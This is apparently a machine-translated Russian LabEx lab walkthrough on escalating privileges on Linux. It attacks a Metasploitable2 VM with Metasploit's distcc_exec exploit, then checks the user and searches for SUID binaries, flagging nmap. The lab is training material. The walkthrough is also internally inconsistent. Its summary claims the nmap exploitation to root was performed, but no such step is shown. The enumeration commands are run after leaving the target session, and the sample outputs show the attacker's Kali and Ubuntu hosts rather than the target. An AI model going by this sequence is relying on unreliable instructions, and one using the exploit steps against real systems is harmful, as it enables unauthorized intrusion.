Повышение привилегий на Linux-машине с помощью Nmap

NmapNmapBeginner
Практиковаться сейчас

💡 Этот учебник переведен с английского с помощью ИИ. Чтобы просмотреть оригинал, вы можете перейти на английский оригинал

Введение

В этом лабораторном занятии вы научитесь выполнять повышение привилегий на компьютере с операционной системой Linux после успешного входа под учетной записью не-ROOT-пользователя. Хотя в Интернете есть множество руководств по повышению привилегий в Windows, данное лабораторное занятие посвящено именно повышению привилегий в операционной системе Linux.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/os_version_detection("OS and Version Detection") subgraph Lab Skills nmap/host_discovery -.-> lab-416129{{"Повышение привилегий на Linux-машине с помощью Nmap"}} nmap/os_version_detection -.-> lab-416129{{"Повышение привилегий на Linux-машине с помощью Nmap"}} end

Подготовка среды

На этом этапе мы запустим необходимые компоненты лабораторной среды, включая контейнер Kali Linux и виртуальную машину Metasploitable2.

  1. Запустите виртуальную машину Metasploitable2, выполнив следующую команду в терминале:
sudo virsh start Metasploitable2

Подождите, пока целевая машина запустится. Это может занять от 1 до 3 минут.

  1. Проверьте, запустилась ли виртуальная машина, отправив ping по имени хоста target:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить отправку ping.

  1. Запустите контейнер Kali Linux и войдите в его оболочку bash:
docker run -ti --network host b5b709a49cd5 bash
  1. Внутри контейнера Kali проверьте сетевое соединение, отправив ping по имени хоста target:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить отправку ping.

Получение первоначального доступа к целевой машине

На этом этапе мы будем использовать Metasploit Framework (MSF) в контейнере Kali для получения первоначального доступа к целевой машине Metasploitable2.

  1. Внутри контейнера Kali запустите консоль Metasploit:
cd ~
msfconsole
  1. В консоли Metasploit используйте эксплойт-модуль distcc_exec:
use exploit/unix/misc/distcc_exec
  1. Установите IP-адрес целевого хоста:
set RHOST 192.168.122.102
  1. Запустите эксплойт для получения доступа к целевой машине:
exploit

После успешного выполнения эксплойта вы должны увидеть открытую сессию командной оболочки, что означает, что вы получили доступ к целевой машине.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Проверка привилегий текущего пользователя

После получения первоначального доступа необходимо проверить привилегии текущего пользователя, чтобы определить, требуется ли дальнейшее повышение привилегий.

  1. Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
  1. Проверьте текущего пользователя:
whoami
  1. Проверьте идентификатор пользователя и информацию о группе:
id

Если идентификатор пользователя не равен 0 (root), вам нужно будет повысить привилегии, чтобы получить административный доступ.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Сбор информации о системе

Перед попыткой повышения привилегий необходимо собрать информацию о целевой системе, чтобы выявить потенциальные уязвимости.

  1. Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
  1. Проверьте версию дистрибутива Linux:
lsb_release -a

Вот пример вывода, который вы можете увидеть:

[*] exec: lsb_release -a

No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2023.2
Codename:       kali-rolling
  1. Проверьте версию ядра:
uname -a

Вот пример вывода, который вы можете увидеть:

Linux iZj6ceecakbzgu9eomquhhZ 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux
  1. Найдите файлы с битом SUID, которые потенциально могут быть использованы для повышения привилегий:
find / -perm -u=s -type f 2> /dev/null

В выводе вы должны увидеть бинарный файл /usr/bin/nmap, который имеет известную уязвимость для повышения привилегий в более старых версиях. Нажмите Ctrl+C, чтобы выйти.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Резюме

В этой лабораторной работе вы научились повышать привилегии на машине с Linux после получения первоначального доступа от имени не - root пользователя. Мы начали с настройки среды LabEx с использованием контейнера Kali Linux и виртуальной машины Metasploitable2. Затем мы использовали Metasploit Framework для эксплойта уязвимости Distcc и получения первоначального доступа к целевой машине.

После того, как мы убедились, что не являемся root - пользователем, мы собрали информацию о целевой системе, такую как версия дистрибутива Linux, версия ядра и файлы с битом SUID. Мы определили бинарный файл Nmap как потенциальную уязвимость и эксплойтировали ее, чтобы повысить наши привилегии до root.

Завершив эту лабораторную работу, вы получили практический опыт в процессе повышения привилегий на системах Linux, что является важным навыком в области кибербезопасности. Вы также научились использовать различные команды Linux для сбора информации о системе и эксплойта уязвимостей, а также как использовать уязвимости в программном обеспечении для получения повышенного доступа.